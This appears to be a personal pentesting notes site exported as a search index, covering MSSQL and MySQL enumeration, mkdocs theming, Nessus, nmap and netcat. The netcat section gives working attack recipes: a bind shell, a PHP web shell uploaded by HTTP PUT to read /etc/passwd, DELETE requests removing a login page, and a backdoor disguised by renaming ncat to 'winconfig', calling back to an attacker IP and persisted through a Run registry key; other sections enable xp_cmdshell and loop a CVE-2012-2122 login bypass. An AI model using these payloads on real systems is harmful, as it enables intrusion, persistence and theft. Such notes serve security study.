# Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo \n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure: \nSELECT is_srvrolemember('sysadmin')\ngo\n# If your user is admin, it will return 1.\n\n# Read Local Files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\n

    Also, you might be interested in executing a cmd shell using xp_cmdshell by reconfiguring sp_configure.
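A minimal sketch of that reconfiguration, runnable from any of the MSSQL clients above (requires sysadmin rights):

-- Enable advanced options\nEXEC sp_configure 'show advanced options', 1;\nRECONFIGURE;\n\n-- Enable xp_cmdshell\nEXEC sp_configure 'xp_cmdshell', 1;\nRECONFIGURE;\n\n-- Execute an OS command as the SQL service account\nEXEC xp_cmdshell 'whoami';\n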

    ","tags":["database","cheat sheet"]},{"location":"my-mkdocs-material-customization/","title":"mkdocs","text":"

    MkDocs is a static site generator for building project documentation. Documentation source files are written in Markdown, and configured with a single YAML configuration file.

    I chose mkdocs to build the site because of its simplicity.

    Link to site.

    Some other options: hugo.
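For reference, the day-to-day mkdocs workflow boils down to a handful of commands:

# Create a new project skeleton\nmkdocs new my-site\n\n# Serve locally with live reload at http://127.0.0.1:8000\nmkdocs serve\n\n# Build the static site into ./site\nmkdocs build\n\n# Build and push to the gh-pages branch\nmkdocs gh-deploy\n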

    "},{"location":"my-mkdocs-material-customization/#my-install","title":"My install","text":"

Install a virtual environment manager such as virtualenvwrapper.

    Create your virtual environment and activate it:

    mkvirtualenv hackinglife\n\nworkon hackinglife\n

Install mkdocs. In my case, it's version 1.5.3:

    pip install mkdocs==1.5.3\n

    Install material theme for mkdocs:

    pip install mkdocs-material\n

    Install plugins such as glightbox:

    pip install mkdocs-glightbox\n

    Install plugins such as \"git-revision-date-localized\"

    pip3 install mkdocs-git-revision-date-localized-plugin\n

    Install plugins such as \"mkdocs-pdf-export\"

    pip install mkdocs-pdf-export-plugin\n
    "},{"location":"my-mkdocs-material-customization/#customizing-material-theme-pluggins-and-extensions","title":"Customizing Material theme: pluggins and extensions","text":"

    Some plugins like \"mkdocs-glightbox\", \"mkdocs-git-revision-date-localized-plugin\", or \"mkdocs-pdf-export-plugin\", need to be added when the web app is deployed, so for that reason they are added at .github/workflow/doc.yml.

But some other plugins just need to be added in the mkdocs configuration file (mkdocs.yml) like this:

    markdown_extensions:\n    - extensionName\n
    "},{"location":"my-mkdocs-material-customization/#admonition-extension","title":"Admonition extension","text":"

    Source: https://squidfunk.github.io/mkdocs-material/reference/admonitions/

    In mkdocs.yml:

    markdown_extensions:\n    - admonition\n    - pymdownx.details \n    - pymdownx.superfences\n
    "},{"location":"my-mkdocs-material-customization/#basic-syntax","title":"Basic syntax","text":"

    Code in the document:

    !!! note \"title\"\n\n    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod \n    nulla. \n

    How it is seen:

    title

    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla.

    Admonitions follow a simple syntax: a block starts with\u00a0!!!, followed by a single keyword used as a\u00a0type qualifier. The content of the block follows on the next line, indented by four spaces

    !!! <typeofchart> \"title\"\n

    When\u00a0Details\u00a0is enabled and an admonition block is started with\u00a0???\u00a0instead of\u00a0!!!, the admonition is rendered as a collapsible block with a small toggle on the right side.

These are the type qualifiers: note, abstract, info, tip, success, question, warning, failure, danger, bug, example, quote.
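For example, a collapsible admonition using the ??? marker (the title \"Optional reading\" is just an illustration):

??? tip \"Optional reading\"\n\n    This content stays collapsed until the reader clicks the toggle.\n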

    "},{"location":"my-mkdocs-material-customization/#content-tabs","title":"Content tabs","text":"

    Source: https://squidfunk.github.io/mkdocs-material/reference/content-tabs/

    In mkdocs.yml:

    markdown_extensions:\n  - pymdownx.superfences\n  - pymdownx.tabbed:\n      alternate_style: true \n

    Code in the document:

    === \"Left\"\n    Content\n\n=== \"Center\"\n    Content\n\n=== \"Right\"\n    Content\n

    How it is seen:

    LeftCenterRight

    Content

    Content

    Content

    "},{"location":"my-mkdocs-material-customization/#data-tables","title":"Data tables","text":"

    Source: https://squidfunk.github.io/mkdocs-material/reference/data-tables/#customization

    In mkdocs.yml:

     extra_javascript:\n      - https://unpkg.com/tablesort@5.3.0/dist/tablesort.min.js\n      - javascripts/tablesort.js\n
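The second entry points at a small init script. Following the Material for MkDocs documentation, docs/javascripts/tablesort.js looks roughly like this:

document$.subscribe(function() {\n  var tables = document.querySelectorAll(\"article table:not([class])\")\n  tables.forEach(function(table) {\n    new Tablesort(table)\n  })\n})\n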

After applying the customization, data tables can be sorted by clicking on a column. This is the code in the document:

    Data table, columns sortable
    | Method      | Description                          |\n| ----------- | ------------------------------------ |\n| `GET`       | Fetch resource  |\n| `PUT`       | Update resource |\n| `DELETE`    | Delete resource |\n

    This is how it is seen:

| Method | Description |
| ------ | ----------- |
| GET | Fetch resource |
| PUT | Update resource |
| DELETE | Delete resource |

"},{"location":"my-mkdocs-material-customization/#pdf-button-in-every-page","title":"PDF button in every page","text":"

Most of the existing plugins offer a print-all-in-one-file solution, which is not the behavior I'm after.

    "},{"location":"my-mkdocs-material-customization/#mkdocs-pdf-export-plugin","title":"mkdocs-pdf-export-plugin","text":"

    https://github.com/zhaoterryy/mkdocs-pdf-export-plugin

    Install and add to gh-deploy workflow:

    pip install mkdocs-pdf-export-plugin\n

    mkdocs.yml

    plugins:\n    - search\n    - pdf-export:\n        verbose: true\n        combined: false\n        media_type: print\n        enabled_if_env: ENABLE_PDF_EXPORT\n

    /docs/css/extra.css

    @page {\n    size: a4 portrait;\n    margin: 25mm 10mm 25mm 10mm;\n    counter-increment: page;\n    font-family: \"Roboto\",\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n    white-space: pre;\n    color: grey;\n    @top-left {\n        content: '\u00a9 2018 My Company';\n    }\n    @top-center {\n        content: string(chapter);\n    }\n    @top-right {\n        content: 'Page ' counter(page);\n    }\n}\n
    "},{"location":"my-mkdocs-material-customization/#resolving-relative-link-issues-when-rendering","title":"Resolving relative link issues when rendering","text":"

    https://octoprint.github.io/mkdocs-site-urls/

    "},{"location":"my-mkdocs-material-customization/#revision-date","title":"Revision date","text":"

https://timvink.github.io/mkdocs-git-revision-date-localized-plugin/

    Install and add to gh-deploy workflow:

# Installs the git revision date (localized) plugin globally\npip install mkdocs-git-revision-date-localized-plugin\n

    mkdocs.yml

# Adding the git revision date (localized) plugin\nplugins:\n  - search\n  - git-revision-date-localized:\n      type: timeago \n      timezone: Europe/Amsterdam \n      fallback_to_build_date: false \n      enable_creation_date: true \n      exclude: \n        - index.md \n      enabled: true \n      strict: true\n

    This plugin needs access to the last commit that touched a specific file to be able to retrieve the date. By default many build environments only retrieve the last commit, which means you might need to:

    • github actions: set\u00a0fetch-depth\u00a0to\u00a00\u00a0(docs)
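In a GitHub Actions workflow, that means configuring the checkout step, for instance:

- uses: actions/checkout@v4\n  with:\n    fetch-depth: 0\n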

    Types

    November 28, 2019           # type: date (default)\nNovember 28, 2019 13:57:28  # type: datetime\n2019-11-28                  # type: iso_date\n2019-11-28 13:57:26         # type: iso_datetime\n20 hours ago                # type: timeago\n28. November 2019           # type: custom\n

To add a revision date to the default mkdocs theme, add an overrides/partials folder to your docs folder and update your mkdocs.yml file. Then you can extend the base mkdocs theme by adding a new file docs/overrides/content.html:

    :octicons-file-code-16: mkdocs.yml
    ```yaml\ntheme:\n    name: mkdocs\n    custom_dir: docs/overrides\n```\n
    :octicons-file-code-16: docs/hackinglifetheme/partials/content.html
    ```html\n<!-- Overwrites content.html base mkdocs theme, taken from \nhttps://github.com/mkdocs/mkdocs/blob/master/mkdocs/themes/mkdocs/content.html -->\n\n{% if page.meta.source %}\n    <div class=\"source-links\">\n    {% for filename in page.meta.source %}\n        <span class=\"label label-primary\">{{ filename }}</span>\n    {% endfor %}\n    </div>\n{% endif %}\n\n{{ page.content }}\n\n<!-- This section adds support for localized revision dates -->\n{% if page.meta.git_revision_date_localized %}\n    <small>Last update: {{ page.meta.git_revision_date_localized }}</small>\n{% endif %}\n{% if page.meta.git_created_date_localized %}\n    <small>Created: {{ page.meta.git_created_date_localized_raw_datetime }}</small>\n{% endif %}\n```\n
    "},{"location":"mybb-pentesting/","title":"Pentesting MyBB","text":"

    Once we know we are in front of a MyBB CMS, one useful tool would be MyBBscan.

    ","tags":["MyBB","pentesting","CMS"]},{"location":"mybb-pentesting/#mybbscan","title":"MyBBScan","text":"

    Original repo: https://github.com/0xB9/MyBBscan.

    My forked repo: https://github.com/amandaguglieri/CMS-MyBBscan.

    ","tags":["MyBB","pentesting","CMS"]},{"location":"mysql/","title":"MySQL","text":"

MySQL is an open-source relational database management system (RDBMS) based on Structured Query Language (SQL). It is developed and managed by Oracle Corporation and was initially released on 23 May 1995. It is widely used in small and large-scale applications and is capable of handling large volumes of data. After Oracle acquired MySQL, concerns in the community about its future led to the development of MariaDB as a fork.

    By default, MySQL uses\u00a0TCP/3306.

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

    MySQL supports different authentication methods, such as username and password, as well as Windows authentication (a plugin is required).

    MySQL\u00a0default system schemas/databases:

    • mysql\u00a0- is the system database that contains tables that store information required by the MySQL server
    • information_schema\u00a0- provides access to database metadata
    • performance_schema\u00a0- is a feature for monitoring MySQL Server execution at a low level
    • sys\u00a0- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#footprinting-mysql","title":"Footprinting mysql","text":"
    sudo nmap $ip -sV -sC -p3306 --script mysql*\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-commands","title":"Basic commands","text":"

Additionally, there are two strings that you can use to comment a line in SQL:

• # The hash symbol.
• -- Two dashes followed by a space.
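For example:

SELECT * FROM persona; # comment with the hash symbol\nSELECT * FROM persona; -- comment with two dashes and a space\n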
# Show databases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Show tables\nSHOW tables;\n\n# Dump columns from nameOftable\nSELECT * FROM NameOfTable;\n# SELECT name, description FROM products WHERE id=9;\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE persona(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP COLUMN edad;\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-queries","title":"Basic queries","text":"
    # Show all columns from table\nSELECT * FROM persona\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n\n# Sorting data on the bases on edad column\nSELECT * FROM persona ORDER BY edad;\n\n# Retrieving first record from the table.\nSELECT * from persona order by edad limit 1;\n\n# Count the number of people stored in persona\nSELECT count(*) from persona;\n\n# Context: a wordpress database\n# Identify how many distinct authors have published a post in the blog\nSELECT DISTINCT(post_author) from wpdatabase.wp_posts;\n
# UNION Statement syntax\n#<SELECT statement> UNION <other SELECT statement>;\n# Both SELECTs must return the same number of columns. Example:\nSELECT name, description FROM products WHERE id=9 UNION SELECT price, NULL FROM products WHERE id=9;\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#enumeration-queries","title":"Enumeration queries","text":"
# Show current user\nSELECT current_user();\nSELECT user();\n\n# Show current database\nSELECT database();\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#interact-with-mysql","title":"Interact with MySQL","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#from-linux","title":"From Linux","text":"
mysql -u username -pPassword123 -h $IP\n# -h host/ip   \n# -u user. By default, MySQL has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\nmysql -u root -h <host/IP>\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#from-windows","title":"From Windows","text":"
    mysql.exe -u username -pPassword123 -h $IP\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#gui-application","title":"GUI Application","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#server-management-studio-or-ssms","title":"Server Management Studio or SSMS","text":"

    SQL Server Management Studio or SSMS

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#mysql-workbench","title":"MySQL Workbench","text":"

    Download from: https://dev.mysql.com/downloads/workbench/.

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#dbeaver","title":"dbeaver","text":"

    dbeaver\u00a0is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

    To install\u00a0dbeaver\u00a0using a Debian package we can download the release .deb package from\u00a0https://github.com/dbeaver/dbeaver/releases\u00a0and execute the following command:

    sudo dpkg -i dbeaver-<version>.deb\n\n# run dbeaver in a second plane\n dbeaver &\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#well-know-vulnerabilities","title":"Well-know vulnerabilities","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#misconfigurations","title":"Misconfigurations","text":"

    Anonymous access enabled.

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#vulnerabilities","title":"Vulnerabilities","text":"

MySQL 5.6.x servers: CVE-2012-2122, among others. It allowed us to bypass authentication by repeatedly attempting to log in with the same incorrect password for a given account: because of a flaw in how MySQL compared password hashes (the return value of memcmp was cast incorrectly), a wrong password was accepted with a probability of roughly 1/256. By simply retrying, an attacker eventually gets authenticated without knowing the real password, and the server gives no indication that anything is wrong.
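A classic proof of concept simply loops the same wrong password (a sketch; it only works against affected builds, and a successful attempt drops you into a MySQL shell):

# Retry the same wrong password; on vulnerable builds one attempt\n# (roughly 1 in 256) will be accepted and open a MySQL shell.\nfor i in $(seq 1 1000); do\n    mysql -u root --password=wrongpass -h $ip 2>/dev/null\ndone\n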

    ","tags":["database","relational database","SQL"]},{"location":"mythic/","title":"Mythic C2 Framework","text":"

    https://github.com/its-a-feature/Mythic

The Mythic C2 framework is an alternative option to Metasploit as a Command and Control framework and toolbox for unique payload generation. A cross-platform, post-exploit, red teaming framework built with GoLang, Docker, docker-compose, and a web browser UI, it's designed to provide a collaborative and user-friendly interface for operators, managers, and reporting throughout red teaming.

    ","tags":["payloads","tools"]},{"location":"nessus/","title":"Nessus","text":"

    Nessus has a client and a server. We use the client to configure the scans and the server to actually perform the scanning processes and report back the result to the client.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#installation","title":"Installation","text":"

    Download .deb from: https://www.tenable.com/downloads/nessus

sudo dpkg -i Nessus-10.3.0-debian9_amd64.deb\nservice nessusd start\n

    Now you can go to https://localhost:8834

Once Nessus Essentials is installed, register on the website to generate an API key.

    Nessus gives us the option to create scan policies. Essentially these are customized scans that allow us to define specific scan options, save the policy configuration, and have them available to us under Scan Templates when creating a new scan.

    This gives us the ability to create targeted scans for any number of scenarios, such as a slower, more evasive scan, a web-focused scan, or a scan for a particular client using one or several sets of credentials.

    To exclude false positives from scan results Under the Resources section, we can select Plugin Rules. In the new plugin rule, we input the host to be excluded, along with the Plugin ID for Microsoft DirectAccess, for instance.

Nessus gives us the option to export scan results in a variety of report formats, as well as the option to export raw Nessus scan results to be imported into other tools, archived, or passed to tools such as EyeWitness. Scans can be exported in two formats: Nessus (scan.nessus) or Nessus DB (scan.db). The .nessus file is an .xml file and includes a copy of the scan settings and plugin outputs. The .db file contains the .nessus file plus the scan's KB, plugin Audit Trail, and any scan attachments.

    Scripts such as the nessus-report-downloader can be used to quickly download scan results in all available formats from the CLI using the Nessus REST API:

    ./nessus_downloader.rb \n
    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#mitigating-issues","title":"Mitigating Issues","text":"

    1. Some firewalls will cause us to receive scan results showing either all ports open or no ports open. If this happens, a quick fix is often to configure an Advanced Scan and disable the Ping the remote host option.

    2. Adjust Performance Options and modify Max Concurrent Checks Per Host if the target host is often under heavy load, such as a widely used web application.

3. Unless specifically requested, we should never perform Denial of Service checks. The \"safe checks\" setting tells Nessus to skip the plugins within its library of vulnerability checks which Tenable feels can have negative effects on the network, device, or application being tested.

4. It is also essential to keep in mind the potential impact of vulnerability scanning on a network, especially on low-bandwidth or congested links. This can be measured with vnstat while the scan runs (in the sketch below, eth0 is an assumption; use whichever interface the scan traffic leaves through):
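# Watch live traffic on the scanning interface while the scan runs\nvnstat -l -i eth0\n# Compare the rate before and during the scan to estimate its impact\n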

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"netbios/","title":"NetBIOS - Network Basic Input Output System","text":"

    NetBIOS stands for Network Basic Input Output System. Basically, servers and clients use NetBIOS when viewing network shares on the local area network.

NetBIOS supplies the hostname, NetBIOS name, domain, and network shares when querying a computer. When an MS Windows machine browses a network, it uses NetBIOS (quick lookup commands are sketched after the list):

• datagrams to list the shares and the machines (port 138 / UDP)
• names to find workgroups (port 137 / UDP)
• sessions to transmit data to and from a windows share (port 139 / TCP)
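Quick ways to query this information (nbtstat ships with Windows; nmblookup comes with the Samba client tools):

# From Windows: list the NetBIOS name table of a remote host\nnbtstat -A $ip\n\n# From Linux: same lookup by IP address\nnmblookup -A $ip\n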
    ","tags":["windows"]},{"location":"netbios/#create-a-network-share-in-a-windows-based-environment","title":"Create a network share in a Windows based environment:","text":"
    1. Turn on the File and Printer Sharing service.
    2. Choose directories to share
    UNC paths (Universal Naming Convention paths) \\\\Servername\\ShareName\\file.nat\n\n\\\\ComputerName\\C$\n\n\\\\ComputerName\\admin$\n\n\\\\ComputerName\\ipc$\u00a0 \u00a0 \u00a0 //inter process communication\n
    ","tags":["windows"]},{"location":"netcat/","title":"netcat","text":"","tags":["http"]},{"location":"netcat/#installation","title":"Installation","text":"

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. It comes preinstalled in Kali.

    For windows: https://nmap.org/ncat/.

    For linux:

    sudo apt install ncat\n
    ","tags":["http"]},{"location":"netcat/#usage","title":"Usage","text":"

It can be used to interact with raw TCP and UDP services, HTTP among them.

    nc $ip <port> -flags\n
    ","tags":["http"]},{"location":"netcat/#fingerprinting-with-netcat","title":"Fingerprinting with netcat","text":"
    nc $ip 80\nHEAD / HTTP/1.0     \n# And hit RETURN twice\n

Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interrogate a service:

     nc -nv $ip <PORT NUMBER>\n
    ","tags":["http"]},{"location":"netcat/#netcat-commands","title":"Netcat commands","text":"","tags":["http"]},{"location":"netcat/#as-a-server","title":"As a server","text":"
nc -lvp 8888\n#-p: specify a port\n#-l: listen mode\n#-v: verbosity\n#-u: enforces udp connection\n#-e: executes the given command\n
    ","tags":["http"]},{"location":"netcat/#as-a-client","title":"As a client","text":"
    nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#transfer-data","title":"Transfer data","text":"

    On the server side:

    #data will be printed on screen\nnc -lvp <port>  \n

    On the client side:

echo \"hello\" | nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#transfer-data-and-save-it-in-a-file","title":"Transfer data and save it in a file","text":"

    On the server side:

# Data will be stored in received.txt file.\nnc -lvp <port> > received.txt   \n

    On the client side:

echo \"hello\" | nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#transfer-file-and-save-it","title":"Transfer file and save it","text":"

    On the server side:

# Received data will be stored in received.txt file.\nnc -lvp <port> > received.txt   \n

    On the client side:

cat tobesentfile.txt | nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#netcat-shell","title":"Netcat shell","text":"

    On the server side:

    nc -lvp <port> -e /bin/bash\n

    On the client side:

    nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#some-enumeration-techniques-for-http-verbs","title":"Some enumeration techniques for HTTP verbs","text":"
    # Send a OPTIONS message with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n
    ","tags":["http"]},{"location":"netcat/#some-exploitation-techniques-for-http-verbs","title":"Some exploitation techniques for HTTP verbs","text":"","tags":["http"]},{"location":"netcat/#delete-attack","title":"DELETE attack","text":"
    # General syntax for removing a resource from server using netcat\nnc victim.site 80\nDELETE /path/to/resource.txt HTTP/1.0\n\n\n# Example for removing the login page of a site\nnc victim.site 80\nDELETE /login.php HTTP/1.0\n
    ","tags":["http"]},{"location":"netcat/#put-attack-getting-a-shell","title":"PUT attack: getting a shell","text":"
# Save for instance a php basic shell in a file (shell.php):\n\n<?php \nif (isset($_GET['cmd']))\n{\n    $cmd = $_GET['cmd'];\n    echo '<pre>';\n    $result = shell_exec($cmd);\n    echo $result;\n    echo '</pre>';\n}\n?>\n\n\n# Count the size of the file\nwc -m shell.php\n\n# Send with netcat the HTTP verb message\nnc victim.site 80\nPUT /shell.php HTTP/1.0\nContent-type: text/html\nContent-length: [number you got with wc -m payload]\n\n\n# Run the exploit by typing in the browser:\nhttp://victim.site/shell.php?cmd=cat+/etc/passwd\n
    ","tags":["http"]},{"location":"netcat/#backdoors-with-netcat","title":"Backdoors with netcat","text":"","tags":["http"]},{"location":"netcat/#the-attacker-initiates-the-connection","title":"The attacker initiates the connection","text":"

In the victim machine: if Windows, get the ncat.exe executable, rename it to something else such as winconfig, and run in the command line:

winconfig -l -p <port> -e cmd.exe\n# Example: winconfig -l -p 5555 -e cmd.exe\n

    In the attacker machine:

    ncat <victim IP address> <port specified>\n# Example: ncat 192.168.0.40 5555\n
    ","tags":["http"]},{"location":"netcat/#the-victim-initiates-the-connection","title":"The victim initiates the connection","text":"

    Great to avoid firewalls!!!

In the victim machine: if Windows, get the ncat.exe executable, rename it to something else such as winconfig, and run in the command line:

    winconfig -e cmd.exe <attacker IP> <port>\n# Example: winconfig -e cmd.exe 192.168.1.40 5555\n
    In the attacker machine:

    ncat -l -p <port> -v\n# Example: ncat -l -p 5555 -v\n
    ","tags":["http"]},{"location":"netcat/#creating-a-registry-in-regedit","title":"Creating a registry in regedit","text":"
    • In regedit, go to Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    • Right-Button > New > String value
• We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig)
    • We edit the registry and we add the path to the executable file and some commands in the Value data:
\"C:\\Windows\\System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\"\n# For instance: \"C:\\Windows\\System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\"\n
    ","tags":["http"]},{"location":"netcraft/","title":"netcraft","text":"

    Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used.

Sometimes we can spot the actual IP address the webserver used before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration still permits it.

    See Information Gathering phase in a Security assessment.

    ","tags":["web","pentesting","reconnaissance"]},{"location":"netdiscover/","title":"netdiscover - A network enumeration tool based on ARP request","text":"

Netdiscover is another discovery tool, built into Kali Linux 2018.2. It performs reconnaissance and discovery on both wireless and switched networks using ARP requests.

What is cool about netdiscover? While nmap is the better-suited tool for almost everything, netdiscover provides a way to find internal IP addresses and MAC addresses. That is the difference: netdiscover works only on internal networks.

    ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#installation","title":"Installation","text":"

    Sometimes, you may be given an outdated kali ova with no netdiscover tool installed. To install:

    sudo apt-get install netdiscover\n
    ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#basic-commands","title":"Basic commands","text":"
    # Get help\nnetdiscover -h\n\n# Get all host in an interface and in a range\n# -i: interface\n# -r: range\nnetdiscover -i eth0 -r 192.168.5.42/24 \n
    ","tags":["reconnaissance","pentesting"]},{"location":"network-traffic-capture/","title":"Network traffic capture tools","text":"","tags":["pentesting","network","toolS"]},{"location":"network-traffic-capture/#some-proxy-tools","title":"Some proxy tools","text":"
    • Wireshark.
    • Netmon (Microsoft Network Monitor).
    • Fiddler: a web debugging proxy.
    • BurpSuite.
    • Echo Mirage: for thick clients: freeware tool that hooks into an application\u2019s process and enables us to monitor the network interactions being done.
    • Postman.
    ","tags":["pentesting","network","toolS"]},{"location":"nikto/","title":"nikto","text":"

    You will get some results related to headers such as, for example:

    • The anti-clickjacking X-Frame-Options header is not present.
    • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

    Run:

    nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
    ","tags":["web pentesting","reconnaissance","WSTG-INFO-02"]},{"location":"nishang/","title":"Nishang","text":"

    Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

    ","tags":["payloads","tools"]},{"location":"nishang/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/samratashok/nishang.

    sudo apt install nishang\n
    ","tags":["payloads","tools"]},{"location":"nishang/#antak-webshell","title":"Antak Webshell","text":"

    Antak is a webshell written in ASP.Net which utilizes PowerShell. Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. Antak is included within the Nishang project.

    The Antak files can be found in the /usr/share/nishang/Antak-WebShell directory.

When uploaded to an HTTP server on the victim machine, the Antak web shell functions like a PowerShell console. However, it will execute each command as a new process. It can also execute scripts in memory and encode the commands you send.

    Before uploading Antak you will need to specify the user and password you want to use.

    ","tags":["payloads","tools"]},{"location":"nmap/","title":"nmap - A network exploration and security auditing tool","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#description","title":"Description","text":"

Network Mapper is an open-source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Another discovery feature is operating system detection. These features are extensible by scripts that provide more advanced service detection.

    nmap <scan types> <options> $ip\n
# commonly used\nnmap -sT -Pn --unprivileged --script banner $ip\n\n# enumerate ciphers supported by the application server\nnmap -sT -p 443 -Pn --unprivileged --script ssl-enum-ciphers $ip\n\n# SYN-scan the top 10,000 most well-known ports\nnmap -sS $ip --top-ports 10000\n

Worthwhile for understanding how packets are sent and received is the --packet-trace option. Also, --reason displays the reason for a specific result.

Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interrogate a service:

     nc -nv $ip <PORT NUMBER>\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#cheat-sheet","title":"Cheat Sheet","text":"

    By default, Nmap will conduct a TCP scan unless specifically requested to perform a UDP scan.

nmap 10.0.2.1\nnmap 10.0.2.1/24\nnmap 10.0.2.1-254\nnmap 10.0.*.*\nnmap 10.0.2.1,3,17\nnmap 10.0.2,4.1,3,17\nnmap domain.com\nnmap 10.0.2.1 -p 3389\nnmap 10.0.2.1 -p 80,3389\nnmap 10.0.2.1 -p 50-90\nnmap 10.0.2.1 -p U:53, T:80\n\n# ***** Saving results ******\n# -----------------------------------------\n# -oN: Normal output with .nmap file extension\n# -oG: Grepable output with the .gnmap file extension\n# -oX: XML output  with the .xml file extension\n# -oA: Save results in all formats\n# -oA target: Saves the results in all formats, starting the name of each file with 'target'.\nsudo nmap $ip -oA path/to/target\n\n\n# It forces port enumeration and it's not limited to 1000 ports\nnmap $ip -p-     \n\n# Disables port scanning. If we disable port scan (`-sn`), Nmap automatically performs a ping scan with `ICMP Echo Requests` (`-PE`). Also called ping scan or ping sweep. More reliable than pinging the broadcast address because hosts do not reply to broadcast queries.\nnmap -sn $ip\n\n# Disables DNS resolution.\nnmap -n $ip\n\n# Disables ARP ping.\nnmap $ip --disable-arp-ping\n\n# This option skips the host discovery stage altogether. It deactivates the ICMP echo requests\nnmap  -Pn  $ip  \n\n# Scans top 100 ports.\nnmap  -F  $ip \n\n# Shows the progress of the scan every 5 seconds.\nnmap $ip --stats-every=5s\n\n# To skip host discovery and port scan, while still allowing NMAP Scripting Engine to run, we use -Pn -sn combined.\nnmap -Pn -sn $ip\n\n# OS detection\nnmap -O $ip \n\n# Limit OS detection to promising targets\nnmap -O $ip --osscan-limit\n\n# Guess OS more aggressively\nnmap -O $ip --osscan-guess\n\n# Version detection\nnmap -sV $ip \n\n# Intensity level goes from 0 to 9\nnmap -sV $ip --version-intensity 8  \n\n# tcpwrapped means that the TCP handshake was completed, \n# but the remote host closed the connection without receiving any data. \n# This means that something is blocking connectivity with the target host. \n\n# OS detection + version detection + script scanning + traceroute\nnmap -A $ip\n\n# Half-open scanning. SYN + SYN ACK + RST\n# A well-configured IDS will still detect the scan\nnmap -sS $ip\n\n# TCP connect scan: SYN + SYN ACK + ACK + DATA (banner) +RST\n# This scan gets recorded in the application logs on the target systems\nnmap -sT $ip\n\n# Scan a list of hosts. One per line in the file\nnmap -sn -iL hosttoscanlist.txt \n\n# List targets to scan\nnmap -sL $ip 